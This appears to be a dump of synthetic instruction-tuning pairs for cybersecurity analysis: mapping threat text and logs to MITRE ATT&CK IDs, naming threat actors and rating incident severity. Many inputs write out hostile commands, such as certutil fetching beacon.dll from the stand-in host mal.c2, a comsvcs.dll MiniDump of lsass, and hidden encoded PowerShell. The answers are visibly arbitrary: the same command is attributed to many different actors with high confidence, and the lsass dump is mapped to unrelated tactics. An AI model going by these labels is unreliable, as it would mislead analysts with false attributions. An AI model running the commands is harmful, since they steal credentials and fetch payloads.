messages
listlengths
2
2
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RainyDay can download files to a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for newly constructed network connections that may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.", "role": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 673 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.159.157.203", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0003\", \"TA0001\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Winnti for Windows can add a service named wind0ws to the Registry to achieve persistence after reboot.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PowerSploit has modules such as Get-NetDomainTrust and Get-NetForestTrust to enumerate domain and forest trusts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.127.238.246", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-OK41HGLI21)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Crit...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Operation Wocao has used valid VPN credentials to gain initial access.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1078\"]}", "role": "assistant"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typh...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1838 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.93.246.186", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T15...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2415 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.69.227.253", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SslMM contains a feature to manipulate process privileges and tokens.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1134\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-20HMM0WSU6)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Command and Control", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-EXDRNQ023Q)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Credential Access, Defense Evasion", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function.Then it starts the process-hollowing shellcode, which is s...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.27.121.119", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.187.204.236", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2221 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.6.167.190", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.", "role": "user" }, { "content": "{\"tactics\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1011 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.143.66.138", "role": "user" }, { "content": "{\"tactics\": [\"TA0043...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: InvisiMole uses variations of a simple XOR encryption routine for C&C communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH).", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.004\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1998 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-V2470187CQ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WarzoneRAT can download and execute additional files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.125.221.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0043\", \"TA0005\"], ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.001\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.26.183.202", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0043\", \"TA0004\"], ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Require signed binaries.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\", \"T1036.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-3UQUOJOJTY)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 705 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-SK7Z0MVGGP)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery, Credential Access, Lateral Movement", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-GNL33KZD8X)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"E...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 899 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.84.27.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-IT6J5B0E18)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Impact, Lateral Movement", "role": "user" }, {...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-QJXOIA6V80)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Exfiltration, Execution", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.165.217.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0005\"], \"techniq...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Brave Prince terminates antimalware processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1562\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High\"}", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Msiexec.exe binary may also be digitally signed by Microsoft.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.007\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-MBEF2C79S1)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-ENF64HX4W1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Crit...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.", "role": "user" }, { "content"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-DGJ7LVWI5F)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Exfiltration", "role": "user" }, { "content": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-2ARVUBVOPT)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assist...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.140.65.145", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through IFileOperation.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-5OML1ISGT3)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Persistence", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-ZGI3FRH7RN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery, Reconnaissance, Execution", "role": "user" }, { "conte...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1446 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.122.244.242", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T102...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state", "role": "user" },...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.94.225.87", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0002\", \"TA0008\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1974 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.16.173.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: 11/1/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}", "role"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3449 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.35.167.155", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0006\"], \"technique...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2316 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.79.134.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0006\", \"TA0004...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2005 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.94.56.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0009\", \"TA...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1989 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.39.236.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0002\", \"TA0006\"], \"t...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3772 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-N3T22XYXAQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Persistence", "role": "user" }, { "content": "{\"severity\": \"Extr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-8M5KVOD5WO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Reconnaissance, Initial Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ECCENTRICBANDWAGON can use cmd to execute commands on a victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-QAOKURLL30)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-3CJTBL33PD)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Initial Access, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 627 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Donut can use HTTP to download previously staged shellcode payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for processes being accessed that may search for common password storage locations to obtain user credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555\"]}", "role":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-RRJUTOMVB1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Impact, Credential Access", "role": "user" }, { ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-C4RNSYK4L1)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Extreme\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PowerSploit's Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered S...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\":...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3175 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.96.0.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2855 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.123.57.38", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T148...